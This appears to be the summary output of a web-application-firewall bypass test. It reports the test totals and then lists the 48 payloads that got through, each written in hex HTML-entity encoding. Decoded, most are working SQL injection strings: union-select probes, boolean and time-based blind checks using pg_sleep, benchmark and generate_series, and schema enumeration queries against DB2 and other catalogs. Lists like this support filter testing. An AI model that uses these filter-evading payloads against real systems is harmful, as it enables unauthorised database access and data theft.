================================================================================
File: hexentities.txt - Summary
================================================================================
Total Tested: 11453
Bypassed: 48
Blocked: 11405
Bypass Rate: 0.42%
================================================================================

BYPASSED PAYLOADS:
--------------------------------------------------------------------------------

&#x61;&#x27;&#x20;
&#x40;
&#x50;&#x52;&#x49;&#x4e;&#x54;
&#x25;&#x32;&#x41;&#x25;&#x32;&#x38;&#x25;&#x37;&#x43;&#x25;&#x32;&#x38;&#x6f;&#x62;&#x6a;&#x65;&#x63;&#x74;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x25;&#x33;&#x44;&#x25;&#x32;&#x41;&#x25;&#x32;&#x39;&#x25;&#x32;&#x39;
&#x61;&#x73;
&#x31;
&#x2f;&#x2f;
&#x40;&#x76;&#x61;&#x72;&#x69;&#x61;&#x62;&#x6c;&#x65;
&#x62;&#x66;&#x69;&#x6c;&#x65;&#x6e;&#x61;&#x6d;&#x65;
&#x3f;
&#x61;
&#x6e;&#x73;
&#x30;&#x78;&#x37;&#x37;&#x30;&#x30;&#x36;&#x31;&#x30;&#x30;&#x36;&#x39;&#x30;&#x30;&#x37;&#x34;&#x30;&#x30;&#x36;&#x36;&#x30;&#x30;&#x36;&#x46;&#x30;&#x30;&#x37;&#x32;&#x30;&#x30;&#x32;&#x30;&#x30;&#x30;&#x36;&#x34;&#x30;&#x30;&#x36;&#x35;&#x30;&#x30;&#x36;&#x43;&#x30;&#x30;&#x36;&#x31;&#x30;&#x30;&#x37;&#x39;&#x30;&#x30;&#x32;&#x30;&#x30;&#x30;&#x32;&#x37;&#x30;&#x30;&#x33;&#x30;&#x30;&#x30;&#x33;&#x41;&#x30;&#x30;&#x33;&#x30;&#x30;&#x30;&#x33;&#x41;
&#x30;
&#x68;&#x61;&#x76;&#x69;&#x6e;&#x67;
&#x22;&#x31;&#x27;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x29;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x72;&#x6f;&#x77;&#x20;&#x28;&#x20;&#x36;&#x32;&#x33;&#x37;&#x2c;&#x37;&#x34;&#x36;&#x39;&#x20;&#x29;&#x20;&#x3e;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x2c;&#x63;&#x6f;&#x6e;&#x63;&#x61;&#x74;&#x20;&#x28;&#x20;&#x30;&#x78;&#x37;&#x31;&#x37;&#x31;&#x37;&#x30;&#x36;&#x61;&#x37;&#x31;&#x2c;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x20;&#x28;&#x20;&#x65;&#x6c;&#x74;&#x20;&#x28;&#x20;&#x36;&#x32;&#x33;&#x37;&#x20;&#x3d;&#x20;&#x36;&#x32;&#x33;&#x37;&#x2c;&#x31;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x29;&#x20;&#x2c;&#x30;&#x78;&#x37;&#x31;&#x37;&#x61;&#x37;&#x36;&#x37;&#x61;&#x37;&#x31;&#x2c;&#x66;&#x6c;&#x6f;&#x6f;&#x72;&#x20;&#x28;&#x20;&#x72;&#x61;&#x6e;&#x64;&#x20;&#x28;&#x20;&#x30;&#x20;&#x29;&#x20;&#x2a;&#x32;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x78;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x35;&#x31;&#x39;&#x32;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x33;&#x37;&#x38;&#x35;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x33;&#x39;&#x33;&#x31;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x37;&#x31;&#x35;&#x38;&#x20;&#x29;&#x20;&#x61;&#x20;&#x67;&#x72;&#x6f;&#x75;&#x70;&#x20;&#x62;&#x79;&#x20;&#x78;&#x20;&#x29;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x20;&#x28;&#x20;&#x27;&#x65;&#x6a;&#x75;&#x6c;&#x27;&#x20;&#x3d;&#x20;&#x27;&#x65;&#x6a;&#x75;&#x6c;&#x22;
&#x22;&#x31;&#x27;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2d;&#x2d;&#x22;
&#x22;&#x31;&#x27;&#x20;&#x29;&#x20;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x37;&#x35;&#x36;&#x31;&#x20;&#x3d;&#x20;&#x37;&#x35;&#x36;&#x31;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x38;&#x35;&#x31;&#x34;&#x20;&#x3d;&#x20;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x31;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x63;&#x6f;&#x6c;&#x75;&#x6d;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x32;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x33;&#x20;&#x29;&#x20;&#x2d;&#x2d;&#x22;
&#x22;&#x31;&#x22;&#x22;&#x20;&#x29;&#x20;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x37;&#x39;&#x35;&#x30;&#x20;&#x3d;&#x20;&#x37;&#x39;&#x35;&#x30;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x33;&#x35;&#x38;&#x30;&#x20;&#x3d;&#x20;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x31;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x63;&#x6f;&#x6c;&#x75;&#x6d;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x32;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x33;&#x20;&#x29;&#x20;&#x2d;&#x2d;&#x22;
&#x22;&#x2d;&#x34;&#x37;&#x36;&#x34;&#x22;&#x22;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x6f;&#x72;&#x20;&#x32;&#x37;&#x32;&#x34;&#x20;&#x69;&#x6e;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x32;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x30;&#x36;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x20;&#x28;&#x20;&#x63;&#x61;&#x73;&#x65;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x20;&#x28;&#x20;&#x32;&#x37;&#x32;&#x34;&#x20;&#x3d;&#x20;&#x32;&#x37;&#x32;&#x34;&#x20;&#x29;&#x20;&#x20;&#x74;&#x68;&#x65;&#x6e;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x34;&#x39;&#x20;&#x29;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x34;&#x38;&#x20;&#x29;&#x20;&#x20;&#x65;&#x6e;&#x64;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x32;&#x32;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x38;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x32;&#x32;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x29;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x22;&#x22;&#x64;&#x66;&#x76;&#x7a;&#x22;&#x22;&#x20;&#x6c;&#x69;&#x6b;&#x65;&#x20;&#x22;&#x22;&#x64;&#x66;&#x76;&#x7a;&#x22;
&#x31;&#x27;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x61;&#x73;&#x20;&#x71;&#x71;&#x76;&#x6b;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x31;&#x30;&#x30;&#x37;&#x20;&#x3d;&#x20;&#x31;&#x30;&#x30;&#x37;
&#x31;
&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x70;&#x67;&#x5f;&#x73;&#x6c;&#x65;&#x65;&#x70;&#x20;&#x28;&#x20;&#x35;&#x20;&#x29;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x34;&#x33;&#x38;&#x32;&#x20;&#x3d;&#x20;&#x34;&#x33;&#x38;&#x32;
&#x31;&#x27;&#x20;&#x29;&#x20;&#x20;&#x61;&#x73;&#x20;&#x72;&#x68;&#x76;&#x6d;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x31;&#x34;&#x32;&#x30;&#x20;&#x3d;&#x20;&#x31;&#x34;&#x32;&#x30;
&#x22;&#x31;&#x22;&#x22;&#x20;&#x29;&#x20;&#x20;&#x61;&#x73;&#x20;&#x75;&#x70;&#x79;&#x6e;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x36;&#x31;&#x38;&#x35;&#x20;&#x3d;&#x20;&#x36;&#x31;&#x38;&#x35;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2d;&#x2d;&#x22;
&#x22;&#x31;&#x27;&#x20;&#x29;&#x20;&#x20;&#x61;&#x73;&#x20;&#x78;&#x61;&#x67;&#x75;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x39;&#x30;&#x38;&#x38;&#x20;&#x3d;&#x20;&#x39;&#x30;&#x38;&#x38;&#x20;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x20;&#x28;&#x20;&#x63;&#x61;&#x73;&#x65;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x20;&#x28;&#x20;&#x34;&#x35;&#x38;&#x37;&#x20;&#x3d;&#x20;&#x34;&#x35;&#x38;&#x37;&#x20;&#x29;&#x20;&#x20;&#x74;&#x68;&#x65;&#x6e;&#x20;&#x72;&#x65;&#x67;&#x65;&#x78;&#x70;&#x5f;&#x73;&#x75;&#x62;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x20;&#x28;&#x20;&#x72;&#x65;&#x70;&#x65;&#x61;&#x74;&#x20;&#x28;&#x20;&#x6c;&#x65;&#x66;&#x74;&#x20;&#x28;&#x20;&#x63;&#x72;&#x79;&#x70;&#x74;&#x5f;&#x6b;&#x65;&#x79;&#x20;&#x28;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x36;&#x35;&#x20;&#x29;&#x20;&#x7c;&#x7c;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x36;&#x39;&#x20;&#x29;&#x20;&#x7c;&#x7c;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x38;&#x33;&#x20;&#x29;&#x20;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x20;&#x29;&#x20;&#x2c;&#x30;&#x20;&#x29;&#x20;&#x2c;&#x35;&#x30;&#x30;&#x30;&#x30;&#x30;&#x30;&#x30;&#x30;&#x20;&#x29;&#x20;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x20;&#x29;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x37;&#x36;&#x20;&#x29;&#x20;&#x7c;&#x7c;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x36;&#x35;&#x20;&#x29;&#x20;&#x7c;&#x7c;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x30;&#x32;&#x20;&#x29;&#x20;&#x7c;&#x7c;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x37;&#x32;&#x20;&#x29;&#x20;&#x20;&#x65;&#x6e;&#x64;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x20;&#x28;&#x20;&#x76;&#x61;&#x6c;&#x75;&#x65;&#x73;&#x20;&#x28;&#x20;&#x30;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x29;&#x20;&#x2d;&#x2d;&#x22;
&#x22;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x31;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x63;&#x6f;&#x6c;&#x75;&#x6d;&#x6e;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x32;&#x2c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x2e;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x33;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x38;&#x35;&#x33;&#x35;&#x20;&#x3d;&#x20;&#x38;&#x35;&#x33;&#x35;&#x22;
&#x2d;&#x32;&#x32;&#x33;&#x33;&#x27;&#x20;&#x6f;&#x72;&#x20;&#x20;&#x28;&#x20;&#x31;&#x38;&#x30;&#x37;&#x20;&#x3d;&#x20;&#x37;&#x32;&#x37;&#x34;&#x20;&#x29;&#x20;&#x2a;&#x37;&#x32;&#x37;&#x34;
&#x22;&#x2d;&#x35;&#x30;&#x34;&#x31;&#x27;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x29;&#x20;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x34;&#x38;&#x32;&#x30;&#x2c;&#x34;&#x38;&#x32;&#x30;&#x2c;&#x34;&#x38;&#x32;&#x30;&#x2c;&#x34;&#x38;&#x32;&#x30;&#x2c;&#x34;&#x38;&#x32;&#x30;&#x2c;&#x34;&#x38;&#x32;&#x30;&#x2d;&#x2d;&#x22;
&#x31;&#x20;&#x29;&#x20;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x39;&#x33;&#x34;&#x34;&#x20;&#x3d;&#x20;&#x39;&#x33;&#x34;&#x34;
&#x22;&#x31;&#x27;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x33;&#x37;&#x30;&#x37;&#x20;&#x3d;&#x20;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x73;&#x79;&#x73;&#x69;&#x62;&#x6d;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x31;&#x2c;&#x73;&#x79;&#x73;&#x69;&#x62;&#x6d;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x32;&#x2c;&#x73;&#x79;&#x73;&#x69;&#x62;&#x6d;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x73;&#x20;&#x61;&#x73;&#x20;&#x74;&#x33;&#x20;&#x29;&#x20;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x27;&#x73;&#x69;&#x65;&#x64;&#x27;&#x20;&#x3d;&#x20;&#x27;&#x73;&#x69;&#x65;&#x64;&#x22;
&#x22;&#x31;&#x20;&#x29;&#x20;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x32;&#x30;&#x32;&#x30;&#x20;&#x3d;&#x20;&#x32;&#x30;&#x32;&#x30;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x32;&#x33;&#x38;&#x38;&#x20;&#x3d;&#x20;&#x62;&#x65;&#x6e;&#x63;&#x68;&#x6d;&#x61;&#x72;&#x6b;&#x20;&#x28;&#x20;&#x35;&#x30;&#x30;&#x30;&#x30;&#x30;&#x30;&#x2c;&#x6d;&#x64;&#x35;&#x20;&#x28;&#x20;&#x30;&#x78;&#x36;&#x64;&#x34;&#x35;&#x37;&#x31;&#x35;&#x33;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x23;&#x22;
&#x2d;&#x31;&#x36;&#x30;&#x32;&#x27;&#x20;&#x6f;&#x72;&#x20;&#x33;&#x30;&#x33;&#x38;&#x20;&#x3d;&#x20;&#x33;&#x30;&#x33;&#x38;
&#x31;&#x27;&#x2b;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x68;&#x76;&#x73;&#x62;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x33;&#x36;&#x36;&#x36;&#x20;&#x3d;&#x20;&#x33;&#x36;&#x36;&#x36;
&#x22;&#x31;&#x27;&#x20;&#x29;&#x20;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x23;&#x22;
&#x22;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x28;&#x20;&#x2a;&#x20;&#x29;&#x20;&#x20;&#x66;&#x72;&#x6f;&#x6d;&#x20;&#x67;&#x65;&#x6e;&#x65;&#x72;&#x61;&#x74;&#x65;&#x5f;&#x73;&#x65;&#x72;&#x69;&#x65;&#x73;&#x20;&#x28;&#x20;&#x31;&#x2c;&#x35;&#x30;&#x30;&#x30;&#x30;&#x30;&#x30;&#x20;&#x29;&#x20;&#x23;&#x20;&#x66;&#x6e;&#x63;&#x6b;&#x22;
&#x22;&#x2d;&#x39;&#x39;&#x33;&#x37;&#x27;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x2c;&#x33;&#x39;&#x30;&#x30;&#x23;&#x22;
&#x22;&#x31;&#x27;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2c;&#x6e;&#x75;&#x6c;&#x6c;&#x2d;&#x2d;&#x22;
&#x22;&#x31;&#x22;&#x22;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x61;&#x73;&#x20;&#x68;&#x69;&#x75;&#x66;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x33;&#x32;&#x37;&#x37;&#x20;&#x3d;&#x20;&#x33;&#x32;&#x37;&#x37;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x33;&#x37;&#x31;&#x35;&#x20;&#x69;&#x6e;&#x20;&#x20;&#x20;&#x28;&#x20;&#x20;&#x28;&#x20;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x32;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x30;&#x36;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x20;&#x28;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x20;&#x28;&#x20;&#x63;&#x61;&#x73;&#x65;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x20;&#x28;&#x20;&#x33;&#x37;&#x31;&#x35;&#x20;&#x3d;&#x20;&#x33;&#x37;&#x31;&#x35;&#x20;&#x29;&#x20;&#x20;&#x74;&#x68;&#x65;&#x6e;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x34;&#x39;&#x20;&#x29;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x34;&#x38;&#x20;&#x29;&#x20;&#x20;&#x65;&#x6e;&#x64;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x32;&#x32;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x38;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x32;&#x32;&#x20;&#x29;&#x20;&#x2b;&#x63;&#x68;&#x61;&#x72;&#x20;&#x28;&#x20;&#x31;&#x31;&#x33;&#x20;&#x20;&#x29;&#x20;&#x20;&#x29;&#x20;&#x20;&#x20;&#x29;&#x20;&#x2d;&#x2d;&#x22;
&#x2d;&#x33;&#x39;&#x36;&#x36;&#x27;&#x20;&#x29;&#x20;&#x20;&#x6f;&#x72;&#x20;&#x37;&#x33;&#x33;&#x38;&#x20;&#x3d;&#x20;&#x38;&#x36;&#x35;&#x37;
&#x22;&#x2d;&#x32;&#x30;&#x30;&#x37;&#x27;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x39;&#x31;&#x35;&#x37;&#x20;&#x3d;&#x20;&#x39;&#x31;&#x35;&#x37;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x2c;&#x39;&#x31;&#x35;&#x37;&#x23;&#x22;
&#x31;&#x25;&#x27;&#x20;&#x75;&#x6e;&#x69;&#x6f;&#x6e;&#x20;&#x61;&#x6c;&#x6c;&#x20;&#x73;&#x65;&#x6c;&#x65;&#x63;&#x74;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x23;
&#x2d;&#x37;&#x39;&#x30;&#x33;&#x20;&#x77;&#x68;&#x65;&#x72;&#x65;&#x20;&#x36;&#x36;&#x39;&#x39;&#x20;&#x3d;&#x20;&#x36;&#x36;&#x39;&#x39;&#x20;&#x6f;&#x72;&#x20;&#x38;&#x35;&#x37;&#x31;&#x20;&#x3d;&#x20;&#x38;&#x35;&#x37;&#x31;&#x2d;&#x2d;
